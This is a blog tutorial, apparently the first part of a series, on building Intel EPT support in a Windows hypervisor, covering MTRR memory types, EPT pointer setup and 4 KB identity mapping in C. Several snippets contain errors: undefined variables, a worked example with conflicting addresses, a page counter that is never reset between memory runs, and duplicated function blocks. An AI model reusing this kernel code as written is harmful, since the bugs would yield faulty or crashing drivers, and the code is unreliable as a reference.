I’ve been unable to determine the exact reasoning for the layout of MTRRs, but my best guess would be because of the physical memory map after the BIOS transfers control. For instance, the first 384 KiB is typically reserved for ROM shadowing, real mode IVT, BIOS data, bootloader, etc. Then you have the 64 KiB range A0000h to AFFFFh which typically houses the graphics video memory; and the 32 KiB range C0000h to C7FFFh normally containing the VGA BIOS ROM / Video ROM, though the sub-ranges may require different memory types. It also stands to reason that the first two MTRRs cover the 640 KiB that was referred to as conventional memory back in early PCs.

With this in mind let’s define a few things like the MTRR MSRs, cache type encodings, and the start addresses for each range covered, which a given address will be compared against to determine if it falls within.

#define CACHE_MEMORY_TYPE_UC                 0x0000
#define CACHE_MEMORY_TYPE_WC                 0x0001
#define CACHE_MEMORY_TYPE_WT                 0x0004
#define CACHE_MEMORY_TYPE_WP                 0x0005
#define CACHE_MEMORY_TYPE_WB                 0x0006
#define CACHE_MEMORY_TYPE_UC_MINUS           0x0007
#define CACHE_MEMORY_TYPE_ERROR              0x00FE     /* user-defined */
#define CACHE_MEMORY_TYPE_RESERVED           0x00FF

#define IA32_MTRR_CAP_MSR                    0x00FE
#define IA32_MTRR_DEF_TYPE_MSR               0x02FF

#define IA32_MTRR_FIX64K_00000_MSR           0x0250
#define IA32_MTRR_FIX16K_80000_MSR           0x0258
#define IA32_MTRR_FIX16K_A0000_MSR           0x0259
#define IA32_MTRR_FIX4K_C0000_MSR            0x0268
#define IA32_MTRR_FIX4K_C8000_MSR            0x0269
#define IA32_MTRR_FIX4K_D0000_MSR            0x026A
#define IA32_MTRR_FIX4K_D8000_MSR            0x026B
#define IA32_MTRR_FIX4K_E0000_MSR            0x026C
#define IA32_MTRR_FIX4K_E8000_MSR            0x026D
#define IA32_MTRR_FIX4K_F0000_MSR            0x026E
#define IA32_MTRR_FIX4K_F8000_MSR            0x026F

#define MTRR_FIX64K_BASE                     0x00000
#define MTRR_FIX16K_BASE                     0x80000
#define MTRR_FIX4K_BASE                      0xC0000
#define MTRR_FIXED_MAXIMUM                   0xFFFFF

#define MTRR_FIXED_RANGE_ENTRIES_MAX         88
#define MTRR_VARIABLE_RANGE_ENTRIES_MAX      255

Now, let’s derive a function to get the memory type of an address that falls within a fixed-range.

static u8 mtrr_index_fixed_range( u32 msr_address, u32 idx )
{
    // Read MTRR and extract the memory type value from the bitfield.
    //
    u64 val = __readmsr( msr_address + ( idx >> 3 ) );
    return ( u8 )( msr_val >> ( idx << 3 ) );
}

static u8 mtrr_get_fixed_range_type( u64 address, u64* size )
{
    ia32_mtrrcap_msr mtrrcap = { 0 };
    ia32_mtrr_def_type_msr mtrrdef = { 0 };
    
    mtrrcap.value = __readmsr( IA32_MTRR_CAP_MSR );
    mtrrdef.value = __readmsr( IA32_MTRR_DEF_TYPE_MSR );
    
    // Check if fixed-range MTRRs are enabled, and the address
    // is within the ranges covered by fixed-range MTRRs.
    //
    if( !( mtrrdef.bits.fe ) || address >= MTRR_FIXED_MAXIMUM )
        return CACHE_MEMORY_TYPE_RESERVED;
    
    // Check if address is within the FIX64K range.
    //
    if( address < MTRR_FIX16K_BASE ) 
    {
        *size = PAGE_SIZE << 4; /* 64KB */
        return mtrr_index_fixed_range( IA32_MTRR_FIX64K_00000_MSR, address / ( PAGE_SIZE << 4 ) );
    }
    
    // Check if address is within the FIX16K range.
    //
    if( address < MTRR_FIX4K_BASE ) 
    {
        address -= MTRR_FIX16K_BASE;
        *size = PAGE_SIZE << 2; /* 16 KB */
        return mtrr_index_fixed_range( IA32_MTRR_FIX16K_80000_MSR, address / ( PAGE_SIZE << 2 ) );
    }
    
    // If we're not in any of those ranges, we're in the FIX4K range.
    //
    address -= MTRR_FIX4K_BASE;
    *size = PAGE_SIZE;
    
    return mtrr_index_fixed_range( IA32_MTRR_FIX4K_C0000_MSR, address / PAGE_SIZE );
}

The function above uses the relevant MSRs and MTRRs to determine if an address given falls within a fixed-range. The function mtrr_get_fixed_range_type captures the current values of the MTRR capability MSR and MTRR default memory type, and then uses the bitfields from the structures defined earlier to determine if fixed-range MTRRs are enabled, and that the range falls within the maximum fixed-range supported. It then compares the address provided to the different start addresses of the ranges – MTRR_FIX16K_BASE, which starts at 80000h, for instance. The expression checks to see if the address falls within the 64K fixed-range by checking if it’s less than 80000h. It then sets the size of the range to 64K, or whatever the relevant size for the range is. Remember that the 64K range is comprised of eight 64-KiB sub-ranges. We then have a helper function above as well that utilizes the base MSR and an expression that yields the index into the MSR bitfield from which to take the memory type. Let’s briefly walk through that line and helper function, as it will make sense for the others as well.

Given the address 81A00h passed through this function, we’ll wind up branching into this conditional block:

// Check if address is within the FIX16K range.
//
if( address < MTRR_FIX4K_BASE ) 
{
    address -= MTRR_FIX16K_BASE;
    *size = PAGE_SIZE << 2;
    return mtrr_index_fixed_range( IA32_MTRR_FIX16K_80000_MSR, address / ( PAGE_SIZE << 2 ) );
}

This is because the address 8A100h is less than the start address of the fixed 4K range, and not lower than the fixed 16K range start. Inside this conditional block the address is subtracted from the base of the fixed range (MTRR_FIX16K_BASE) to determine the offset into the range it falls. The size of the range is then set to PAGE_SIZE << 2 which is just PAGE_SIZE (1000h) * 4 yielding 16KiB. We then use the fixed-range MSR for the first 16K MTRR, and the address divided by size of the range which will give us the index into the bitfield of the MSR after it is read. We also use this index to determine which MSR should be read from. The shifts will be explained as we go through the helper function.

static u8 mtrr_index_fixed_range( u32 msr_address, u32 idx )
{
    // Read MTRR and extract the memory type value from the bitfield
    //
    u64 val = __readmsr( msr_address + ( idx >> 3 ) );
    return ( u8 )( msr_val >> ( idx << 3 ) );
}

The helper function above reads from the MSR address, which is IA32_MTRR_FIX16K_80000_MSR in this case, after adding the index divided by 8. In this case, the index is derived from the expression in the conditional block – address / ( PAGE_SIZE << 2 ). This expands to 1A00h / 4000h → 0. This means it will read from the MSR address give, and index into that MSRs bitfield (refer to the earlier diagram) using the value 0. This makes sense as the address 81A00h falls within the first bitfield (0th index) of the IA32_MTRR_FIX16K_80000 MTRR which covers physical addresses 80000h to 83FFFh. It then takes the MSR value, which when read is 06060606`06060606h, and shifts it right by the index multiplied by 8 – which is 0, meaning it will use the value 6h from the first byte of this value. The memory type that corresponds to the value 6h is CACHE_MEMORY_TYPE_WB per our earlier definitions. If this is confusing to follow, I’ve provided a diagram below using the same address as well as an address that would fall within a fixed 4K range.

Figure 5. Calculating memory type for physical address using MTRRs.

The above is pretty straight forward as the fixed-ranges have easily indexable MSRs. Hopefully the example cleared up any potential confusion about how the memory type is calculated for these ranges. Now that we’ve gone over fixed-range MTRRs we need to construct an algorithm for determining the memory type of a variable range MTRR. And yes, there’s more to them… Each variable range MTRR allows software to specify a memory type for a varying number address ranges. This is done through a pair of MTRRs for each range. How do we determine the number of variable ranges our platform supports? Recall the IA32_MTRRCAP_MSR structure.

typedef union _ia32_mtrrcap_msr
{
    u64 value;
    struct
    {
        u64 vcnt : 8;
        u64 fr_mtrr : 1;
        u64 rsvd0 : 1;
        u64 wc : 1;
        u64 smrr : 1;
        u64 prmrr : 1;
        u64 rsvd1 : 51;
    } bits;
} ia32_mtrrcap_msr;

The first 8 bits of the bitfield are allocated for the vcnt member, which indicates the number of variable ranges implemented on the processor. We’ll need to remember this for use in our function. It was mentioned that there are MSR pairs provided for programming the memory type of these variable range MTRRs – these are referred to as IA32_MTRR_PHYSBASEn and IA32_MTRR_PHYSMASKn. The “n” is used to represent a value in the range of 0 (vcnt - 1). The MSR addresses for these pairs are provided below.

#define IA32_MTRR_PHYSBASE0_MSR              0x0200
#define IA32_MTRR_PHYSMASK0_MSR              0x0201

#define IA32_MTRR_PHYSBASE1_MSR              0x0202
#define IA32_MTRR_PHYSMASK1_MSR              0x0203 
     
#define IA32_MTRR_PHYSBASE2_MSR              0x0204
#define IA32_MTRR_PHYSMASK2_MSR              0x0205
   
#define IA32_MTRR_PHYSBASE3_MSR              0x0206
#define IA32_MTRR_PHYSMASK3_MSR              0x0207 
          
#define IA32_MTRR_PHYSBASE4_MSR              0x0208
#define IA32_MTRR_PHYSMASK4_MSR              0x0209 
         
#define IA32_MTRR_PHYSBASE5_MSR              0x020a
#define IA32_MTRR_PHYSMASK5_MSR              0x020b
           
#define IA32_MTRR_PHYSBASE6_MSR              0x020c
#define IA32_MTRR_PHYSMASK6_MSR              0x020d  
        
#define IA32_MTRR_PHYSBASE7_MSR              0x020e
#define IA32_MTRR_PHYSMASK7_MSR              0x020f 
          
#define IA32_MTRR_PHYSBASE8_MSR              0x0210
#define IA32_MTRR_PHYSMASK8_MSR              0x0211
         
#define IA32_MTRR_PHYSBASE9_MSR              0x0212
#define IA32_MTRR_PHYSMASK9_MSR              0x0213

Each of these MSRs has a specific layout, both of them are defined below.

typedef union _ia32_mtrr_physbase_msr
{
    u64 value;
    struct
    {
        u64 type : 8;
        u64 rsvd0 : 4;
        u64 physbase_lo : 39;
        u64 rsvd1 : 13;
    } bits;
} ia32_mtrr_physbase_msr;

typedef union _ia32_mtrr_physmask_msr
{
    u64 value;
    struct
    {
        u64 rsvd0 : 11;
        u64 valid : 1;
        u64 physmask_lo : 39;
        u64 rsvd1 : 13;
    } bits;
} ia32_mtrr_physmask_msr;

  Overlapping Ranges

It’s possible for variable range MTRRs to overlap an address range that is described by another variable range MTRR. It’s important that the reader look over §11.11.4.1 MTRR Precedences (Intel SDM Vol 3A) and ensure these rules are followed when attempting to determine the memory type of an address within a variable range MTRR. The proper implementation to follow the precedence rules are pointed out in the function implementation below, however, ensure you understand why.

If you’re interested in how the variable range MTRRs and PAT are initialized by the hardware/BIOS/firmware I highly recommend checking out the section in the manual referenced in the note above or seeing the recommended reading for additional reading on setting up memory types during early boot stages. This section was initially going to cover the entire initialization, but since it’s unnecessary/out of scope of this series and using the PAT is recommended I’ve cut the remainder out to try and reduce the length of this article. If there is interest in the process of setting them up, I could do a spin-off article about it. In any case, let’s move on to the EPT hierarchies and get our structures updated to facilitate EPT initialization.

— EPT Page Hierarchies

Once the features have been determined to be available we’re going to want to initialize our EPT pointer. This article will only cover the initialization of a single page hierarchy. In a future article, we will cover the initialization of multiple EPT pointers to allow for a switching method that utilizes numerous page hierarchies, as opposed to the standard page-switching that occurs upon EPT violations you may have read about.

There are a number of ways to design a hypervisor, some may choose to only associate EPT data within the vCPU structure, others may take a more decoupled approach and have an EPT state structure for the host that tracks all guest EPT states utilizing some form of global and linked list with accessors. For the sake of simplicity, this article will track the data structures by storing them in the vCPU data structure to be initialized during the MP init phase of your hypervisor. The EPT data structure to be added to your vCPU structure is given below.

typedef struct _ept_state
{
	u64 eptp;
	p64 topmost_ps;
	u64 gaw;
} ept_state, *pept_state;

The members of this structure relevant to this article are presented, however, this structure will/can be extended in the future to support more than one EPTP and topmost paging structure. The gaw member is the guest address width value. It’s important to know when it comes to performing a page walk over the EPT hierarchy. You’ll need to allocate this data structure as you would with any other in your stand-up functions prior to vmxon. If you’re wondering why there is a member for the EPTP and the topmost paging structure, it’s because the EPT pointer has a specific format that contains the topmost paging structure (in this case, PML4) and other configuration information like memory type, walk length, etc.

pept_state vcpu_ept_data = mem_allocate( sizeof( ept_state ) );
zeromemory_s(vcpu_ept_data, sizeof( ept_state ) );

//
// Initialization of the single EPT page hierarchy.
//
// ...
//

At this point, we need to allocate our EPT page hierarchy. This will require standing up our own PML4 table and initializing our EPTP properly. Allocation of our PML4 table is done just like it would be for any other page:

typedef union _physical_address
{
    struct
    {
        u32 low;
        i32 high;
    };
    struct
    {
        u32 low;
        i32 high;
    } upper;
    
    i64 quad;
} physical_address;

static p64 eptm_allocate_entry( physical_address* pa )
{
    p64 pxe = mem_allocate( page_size );
    
    if( !pxe )
        return NULL;
    
    zeromemory_s( pxe, 0, page_size );
    
    // Translate allocated entry virtual address to physical.
    //
    *pa = mem_vtop( pxe );
    
    // Return virtual address of our new entry.
    //
    return pxe;
}

  Custom Address Translation

The mem_vtop function uses a custom address translation/page walker, however, it may be better suited for your first run through to use MmGetPhysicalAddress on the returned virtual address. Implementing your own address translation and page walker isn’t necessary for this basic setup utilizing EPT, but I will include it toward the end of the article as extra reading material.

Your ept_initialize function should look something like this at this point.

// Allocate and initialize prior to vmxon and after feature availability check.
//
pept_state vcpu_ept_data = mem_allocate( sizeof( ept_state ) ); 
zeromemory_s( vcpu_ept_data, sizeof( ept_state ) ); 

// Initialization of the single EPT page hierarchy. 
//
vcpu_ept_data->gaw = PTM4 - 1;
ret = eptm_initialize_pt( vcpu_ept_data );

if( ret != 0 )
    eptm_release_resources( vcpu_ept_data );

vcpu->ept_state = &vcpu_ept_data;

///////////////////////////////// eptm_initialize_pt definition below /////////////////////////////////

// Initialization of page tables associated with our EPTP.
//
vmm_status_t eptm_initialize_pt( pept_state ept_state )
{
    p64 ept_topmost;
    physical_address ept_topmost_pa;
    vmm_status_t ret;
    
    ret = 0;
    
    ept_topmost = eptm_allocate_entry( &ept_topmost_pa );
    if( !ept_topmost )
        return VMM_STATUS_MEM_ALLOC_FAILED;
    
    ept_state->topmost_ps = ept_topmost;
    
    // Initialize the EPT pointer and store it in our EPT state
    // structure.
    //
    // ...
    //
    
    //
    // Construct identity mapping for EPT page hierarchy w/ default
    // page size granularity (4kB).
    //
    // ...
    //
}

The next step is to construct our EPTP and store it in the ept_state structure for later insertion into the VMCS. We’ll first need the structure defined that represents the EPTP format.

typedef struct _eptp_format
{
    u64 value;
    union
    {
        u32 memory_type : 3;
        u32 guest_address_width : 3;
        u32 ad_flag_enable : 1;
        u32 ar_enforcement_ssp : 1;
        u32 rsvd0 : 4;
        u32 ept_pml4_pa_low : 20;
        u32 ept_pml4_pa_high;
    } bits;
} eptp_format;

Once defined we’ll adjust the eptm_initialize_pt function and initialize our EPT pointer.

vmm_status_t eptm_initialize_pt( pept_state ept_state )
{
    p64 ept_topmost;
    physical_address ept_topmost_pa;
    eptp_format eptp;
    vmm_status_t ret;
    
    ret = 0;
    
    ept_topmost = eptm_allocate_entry( &ept_topmost_pa );
    if( !ept_topmost )
        return VMM_STATUS_MEM_ALLOC_FAILED;
    
    ept_state->topmost_ps = ept_topmost;
    
    // Initialize the EPT pointer and store it in our EPT state
    // structure.
    //
    eptp.value = ept_topmost_pa.quad;
    eptp.memory_type = EPT_MEMORY_TYPE_WB;
    eptp.guest_address_width = ept_state->gaw;
    eptp.rsvd0 = 0;
    
    ept_state->eptp = eptp.value;
    
    //
    // Construct identity mapping for EPT page hierarchy w/ default
    // page size granularity (4kB).
    //
    // ...
    //
}

We’ve now successfully set up our topmost paging structure (the EPT PML4 table), and our EPT pointer is formatted for use. All that’s left is to construct the identity mapping permitting all page accesses for our EPT page hierarchy – however, this requires us to cover the differences between the normal paging structures and EPT paging structures.

— Paging Structure Differences

When utilizing EPT there are subtle changes in how things are structured. One of which is the differences in the page table entry structure. For every first-level page mapping structure (FL-PMEn), you’ll see a layout similar to this:

struct
{
    u64 present : 1;
    u64 rw : 1;
    u64 us : 1;
    u64 pwt : 1;
    u64 pcd : 1;
    u64 accessed : 1;
    u64 dirty : 1;
    u64 ps_pat : 1;
    u64 global : 1;
    u64 avl0 : 3;
    u64 pfn : 40;
    u64 avl1 : 7;
    u64 pkey : 4;
    u64 xd : 1;
} pte, pme;

Each field here is used by the page walker to perform address translation and verify if an operation to this page is valid, or invalid. The fields are detailed in the Intel SDM Vol. 3-A Chapter 4 – this is just a definition used in my project as I don’t fancy having masks everywhere for individual bits (so I use bitfields). The pme simply means page mapping entry and is an internal term for my project since all paging structure entries follow a similar format. I use this structure for every table entry at all levels. The only difference is the reserved bits at each level which you’ll either come to memorize or document yourself. Now, let’s take a look at what the page table entry structure looks like for EPT.

For each second-level page mapping entry (SL-PMEn), we see this layout:

struct
{
    u64 rd : 1;
    u64 wr : 1;
    u64 x : 1;
    u64 mt : 3;
    u64 ipat : 1;
    u64 avl0 : 1;
    u64 accessed : 1;
    u64 dirty : 1;
    u64 ex_um : 1;
    u64 avl1 : 1;
    u64 pfn : 39;
    u64 rsvd : 9;
    u64 sssp : 1;
    u64 sub_page_wr : 1;
    u64 avl2 : 1;
    u64 suppressed_ve : 1;
} epte, slpme;

The differences may not be immediately obvious, but the first three bits in this SL-PME represent whether this page allows read, write, or execute (instruction fetches) from the region it controls. As opposed to the first structure which has a bit for determining if the page is present, allows read/write operations, and if user-mode accesses are allowed. The differences become clear when we place the two tables atop one another, as below.

 

Figure 3. Format of a FL-PTE (top) and SL-PTE (bottom).

 

With this information, it’s helpful to derive a data structure to represent the two formats as this will make translation much easier later on. The data structure you create may look something like this:

typedef union _page_entry_t
{
    struct
    {
        u64 present : 1;
        u64 rw : 1;
        u64 us : 1;
        u64 pwt : 1;
        u64 pcd : 1;
        u64 accessed : 1;
        u64 dirty : 1;
        u64 ps_pat : 1;
        u64 global : 1;
        u64 avl0 : 3;
        u64 pfn : 40;
        u64 avl1 : 7;
        u64 pkey : 4;
        u64 xd : 1;
    } pte, flpme;
    
    struct
    {
        u64 rd : 1;
        u64 wr : 1;
        u64 x : 1;
        u64 mt : 3;
        u64 ipat : 1;
        u64 avl0 : 1;
        u64 accessed : 1;
        u64 dirty : 1;
        u64 ex_um : 1;
        u64 avl1 : 1;
        u64 pfn : 39;
        u64 rsvd : 9;
        u64 sssp : 1;
        u64 sub_page_wr : 1;
        u64 avl2 : 1;
        u64 suppressed_ve : 1;
    } epte, slpme;
    
    struct
    {
        u64 rd : 1;
        u64 wr : 1;
        u64 x : 1;
        u64 mt : 3;
        u64 ps_ipat : 1;
        u64 avl0 : 1;
        u64 accessed : 1;
        u64 dirty : 1;
        u64 avl1 : 1;
        u64 snoop : 1;
        u64 pa : 39;
        u64 rsvd : 24;
    } vtdpte;
} page_entry_t;

Using a union here allows me to easily cast to one data structure and reference some internal bitfield layout for whatever specific entry type is needed. You will see this come into play as we initialize the remaining requirements for EPT in the next section.

  Requirements for First-Level and Second-Level Page Tables

Despite the differences in their page table entry format, both tables require a top-level structure such as the PML4 or PML5, and the respective sub tables. Those being PDPT, PDT, PT; or PML4, PDPT, PDT, PT (if PML5 is enabled).

— EPT Identity Mapping (4kB)

When it comes to paging there are a lot of interchanged terms, identity mapping is one of them. It’s sometimes referred to as identity paging or direct mapping. I find the latter more confusing than the former, so throughout the remainder of this article, any time identity mapping/paging is used they are referring to the same thing.

When a processor first enables paging it is required to be executing code from an identity mapped page. This means that the software maps each virtual address to the same physical address. This identity mapping is achieved by initializing page entries to point to the corresponding 4kB physical frame. It may be easier understood through example, so here is the code for constructing the table and associated sub-tables for the guest with a 1:1 mapping to the host.

First, we’ll need a way to get all available physical memory pages allocated. We’re going to reference a global pointer that’s within ntoskrnlMmPhysicalMemoryBlock – which contains a list of physical memory descriptors (_PHYSICAL_MEMORY_DESCRIPTORS). The number of elements in this data structure is determined via the NumberOfRuns member. There is also an array under the Run member, which is of type _PHYSICAL_MEMORY_RUN. Both of these structures are defined in the WDK headers, however, I’ve redefined them to fit the format of the other code.

typedef struct _physical_memory_run
{
    u64 base_page;
    u64 page_count;
} physical_memory_run, *pphysical_memory_run;

typedef struct _physical_memory_desc
{
    u32 num_runs;
    u64 num_pages;
    physical_memory_run run[1];
} physical_memory_desc, *pphysical_memory_desc;

pphysical_memory_desc mm_get_physical_memory_block( void )
{
    return get_global_poi( "nt!MmPhysicalMemoryBlock" );
}

The get_global_poi function is a helper function that uses symbols to locate the MmPhysicalMemoryBlock within ntoskrnl. Our objective now is to initialize EPT entries for all physical memory pages accounted for in this table. However, you may have noticed we’ve only allocated our top-level paging structure. To complete the above it’s required that we implement a few more functions to acquire (if they already exist) or allocate our additional paging structures. Recall page walking on a system with 4-level paging goes PML4 PDPT PDT PT. We’ve allocated our PML4, now we need to determine if there is an existing EPT entry or if we need to allocate it. The logic is described in the diagram below, followed by the implementation of these functions with a brief explanation.

 

Figure 4. Flow of EPT hierarchy initialization.

As the diagram shows, we will call some parent functions to initialize EPT hierarchies, within this if you refer back to the function eptm_initialize_pt from earlier on we’re going to complete the implementation by writing the ept_create_mapping_4k and associated functions. Within these functions, you will see the traversal and validation of additional paging structures, if the paging structure for the current level exists we will call mem_ptov and operate on the physical address returned. Otherwise, we’ll construct a new EPT entry, lucky for us we have this allocation function defined. So, how will the other functions look? Let’s see them below, and then how they’ll fit into the bigger picture.

static p64 ept_map_page_table( u64 entry )
{
    p64 ptable = NULL;
    page_entry_t *pxe = NULL;
    physical_address table_pa = { 0 };
    
    // Check if the EPT entry referenced is valid
    //
    if( entry != 0 )
    {
        table_pa.quad = *( ( u64 )entry & X64_PFN_MASK );
        ptable = mem_ptov( table_pa.quad );
        
        if(!ptable) 
            return NULL;
    }
    else
    {
        // If allocation succeeds construct EPT entry
        //
        ptable = eptm_allocate_entry( &table_pa );
        if( !ptable )
            return NULL;
        
        pxe = ( page_entry_t* )ptable;
        
        // Set access rights. Mask for EPT access all = 7, achieves same as below
        //
        pxe->epte.rd = access.rd;
        pxe->epte.wr = access.wr;
        pxe->epte.x = access.x;
        
        // Set PFN for EPTE entry using PFN mask
        //
        pxe->pfn = ( u64 )( table_pa.quad ) & 0x000FFFFFFFFFF000;
        
        pxe->mt = 0x00;
    }
    
    return ptable;
}

p64 ept_create_mapping_4k( pept_state ept_state, ept_access_rights access, physical_address gpa, physical_address hpa )
{
    // Page structure address
    //
    u64 pmln = NULL;
    
    // Next page structure pointer
    //
    u64 ps_ptr = NULL;
    page_entry_t *pxe = { 0 };
    
    // Get the topmost page table (PML4)
    //
    pmln = ept_state->topmost_ps;
    ps_ptr = &pmln[ PML4_IDX( gpa.quad ) ];

    // Check and validate next table exists, allocate if not (PDPT)
    //
    pmln = ept_map_page_table(ps_ptr);
    ps_ptr = &pmln[ PML3_IDX( gpa.quad ) ];

    // Check and validate PDT exists, allocate if not
    //
    pmln = ept_map_page_table(ps_ptr);
    ps_ptr = &pmln[ PML2_IDX( gpa.quad ) ];

    // Get PTE if it exists, allocate if not
    pmln = ept_map_page_table(ps_ptr);
    ps_ptr = &pmln[ PML1_IDX( gpa.quad ) ];
    
    // Verify page is aligned on 4KB boundary
    //
    if (!PAGE_ALIGN_4KB( hpa.quad ) == hpa.quad)
        hpa.quad &= ( ~( PAGE_SIZE - 1 ) );

    pxe = (page_entry_t*)ps_ptr;
    
    // Set access rights. Mask for EPT access all = 7, achieves same as below
    //
    pxe->epte.rd = access.rd;
    pxe->epte.wr = access.wr;
    pxe->epte.x = access.x;
    
    // Set PFN for EPTE entry using PFN mask
    //
    pxe->pfn = ( u64 )( hpa.quad ) & 0x000FFFFFFFFFF000;
    
    // Set memory type for page table entry.
    //
    pxe->mt = hw_query_mtrr_memtype( gpa.quad );

    return pxe;
}

The functions given above ensure that a table is constructed if it has not already and if so it quickly falls through to the next check/allocation. There are some missing error checks, but to save space I only kept the main logic. With these functions, we can go back to eptm_initialize_pt and complete the implementation.

typedef struct _physical_memory_run
{
    u64 base_page;
    u64 page_count;
} physical_memory_run, *pphysical_memory_run;

typedef struct _physical_memory_desc
{
    u32 num_runs;
    u64 num_pages;
    physical_memory_run run[1];
} physical_memory_desc, *pphysical_memory_desc;

pphysical_memory_desc mm_get_physical_memory_block( void )
{
    return get_global_poi( "nt!MmPhysicalMemoryBlock" );
}

static p64 ept_map_page_table( u64 entry )
{
    p64 ptable = NULL;
    page_entry_t *pxe = NULL;
    physical_address table_pa = { 0 };
    
    // Check if the EPT entry referenced is valid
    //
    if( entry != 0 )
    {
        table_pa.quad = *( ( u64 )entry & X64_PFN_MASK );
        ptable = mem_ptov( table_pa.quad );
        
        if(!ptable) 
            return NULL;
    }
    else
    {
        // If allocation succeeds construct EPT entry
        //
        ptable = eptm_allocate_entry( &table_pa );
        if( !ptable )
            return NULL;
        
        pxe = ( page_entry_t* )ptable;
        
        // Set access rights. Mask for EPT access all = 7, achieves same as below
        //
        pxe->epte.rd = access.rd;
        pxe->epte.wr = access.wr;
        pxe->epte.x = access.x;
        
        // Set PFN for EPTE entry using PFN mask
        //
        pxe->pfn = ( u64 )( table_pa.quad ) & 0x000FFFFFFFFFF000;
        
        pxe->mt = 0x00;
    }
    
    return ptable;
}

p64 ept_create_mapping_4k( pept_state ept_state, ept_access_rights access, physical_address gpa, physical_address hpa )
{
    // Page structure address
    //
    u64 pmln = NULL;
    
    // Next page structure pointer
    //
    u64 ps_ptr = NULL;
    page_entry_t *pxe = { 0 };
    
    // Get the topmost page table (PML4)
    //
    pmln = ept_state->topmost_ps;
    ps_ptr = &pmln[ PML4_IDX( gpa.quad ) ];

    // Check and validate next table exists, allocate if not (PDPT)
    //
    pmln = ept_map_page_table(ps_ptr);
    ps_ptr = &pmln[ PML3_IDX( gpa.quad ) ];

    // Check and validate PDT exists, allocate if not
    //
    pmln = ept_map_page_table(ps_ptr);
    ps_ptr = &pmln[ PML2_IDX( gpa.quad ) ];

    // Get PTE if it exists, allocate if not
    pmln = ept_map_page_table(ps_ptr);
    ps_ptr = &pmln[ PML1_IDX( gpa.quad ) ];
    
    // Verify page is aligned on 4KB boundary
    //
    if (!PAGE_ALIGN_4KB( hpa.quad ) == hpa.quad)
        hpa.quad &= ( ~( PAGE_SIZE - 1 ) );

    pxe = (page_entry_t*)ps_ptr;
    
    // Set access rights. Mask for EPT access all = 7, achieves same as below
    //
    pxe->epte.rd = access.rd;
    pxe->epte.wr = access.wr;
    pxe->epte.x = access.x;
    
    // Set PFN for EPTE entry using PFN mask
    //
    pxe->pfn = ( u64 )( hpa.quad ) & 0x000FFFFFFFFFF000;
    
    // Set memory type for page table entry.
    //
    pxe->mt = hw_query_mtrr_memtype( gpa.quad );

    return pxe;
}

vmm_status_t eptm_initialize_pt( pept_state ept_state )
{
    p64 ept_topmost;
    p64 epte;
    physical_address ept_topmost_pa;
    physical_address pa;
    eptp_format eptp;
    vmm_status_t ret;
    
    ret = 0;
    
    ept_topmost = eptm_allocate_entry( &ept_topmost_pa );
    if( !ept_topmost )
        return VMM_STATUS_MEM_ALLOC_FAILED;
    
    ept_state->topmost_ps = ept_topmost;
    
    // Initialize the EPT pointer and store it in our EPT state
    // structure.
    //
    eptp.value = ept_topmost_pa.quad;
    eptp.memory_type = EPT_MEMORY_TYPE_WB;
    eptp.guest_address_width = ept_state->gaw;
    eptp.rsvd0 = 0;
    
    ept_state->eptp = eptp.value;
    
    // Construct identity mapping for EPT page hierarchy w/ default
    // page size granularity (4kB).
    //
    u32 idx = 0;
    u64 pn = 0;
    physical_memory_desc* pmem_desc = ( physical_memory_desc* )mm_get_physical_memory_block();
    ept_access_rights epte_ar = { .rd = 1, .wr = 1, .x = 1 };
    
    for( ; idx < pmem_desc->num_runs; idx++ )
    {
        physical_memory_run* pmem_run = &pmem_desc->run[ idx ];
        u64 base = ( run->base_page << PAGE_SHIFT );
        
        // For each physical page, map a new EPT entry.
        //
        for( ; pn < run->page_count; pn++ ) 
        {
            pa.quad = ( i64 )( base + ( ( u64 )pn << PAGE_SHIFT ) );
            epte = ept_create_mapping_4k( ept_state, epte_ar, pa, pa );
            if( !epte ) 
            {
                // Unmap each of the entries allocated in the table.
                //
                ept_teardown_tables( ept_state );
                return VMM_LARGE_ALLOCATION_FAILED;
            }
        }
    }
    
    return VMM_OPERATION_SUCCESS;
}

This completes the initialization of our extended page table hierarchy, however, we’re not quite out of the woods. We still need to implement our teardown functions to release all EPT resources and associated structures (unmap), EPT page walk helpers, EPT splitting methods, 2MB page support and 1GB page support, page merging; as well as GVA → GPA and GPA → HPA helpers. And of course, we can’t forget our EPT violation handler.

Conclusion

There’s still a bit of work to do, and now that I finally have time to resume writing I’m hoping to have the next part in a few weeks. The next article will spend time clearing up any confusion and residual requirements to get EPT functioning properly, including the details on the page walking mechanisms present on the platform, the logic, and how to implement our own that handles GVA HPA smoothly. As you can see, the introduction of EPT adds a significant amount of background requirements. Because of this, the next article will primarily be explanations of small snippets of source and logic used when constructing the routines. It’s important that readers get familiar, if not already, with paging and address translation – the added layers of indirection add a lot of complexity that can confuse the reader. There will also be other requirements that are not normally of our concern since hardware/OS typically handles it when converting a guest virtual address to a guest physical address. These are things such as checking reserved bits, the US flag, verifying page size, checking SMAP, the pkey, and so on. The page walking method will be a large part of the next article as it’s important to properly traverse the paging structures.

As always, be sure to check the recommended reading! And please excuse the cluster-f of an article that this is. I had been writing it for a long time and cut out various parts that were written and then deemed unnecessary. In the end, it was still long and I wanted to get a fresh start in a new article as opposed to mashing it all in one — you probably didn’t want that either.

Thanks to @ajkhoury for cleaner macros to help with the address translation explanation.

Recommended Reading

The post MMU Virtualization via Intel EPT: Implementation – Part 1 appeared first on Reverse Engineering.

❌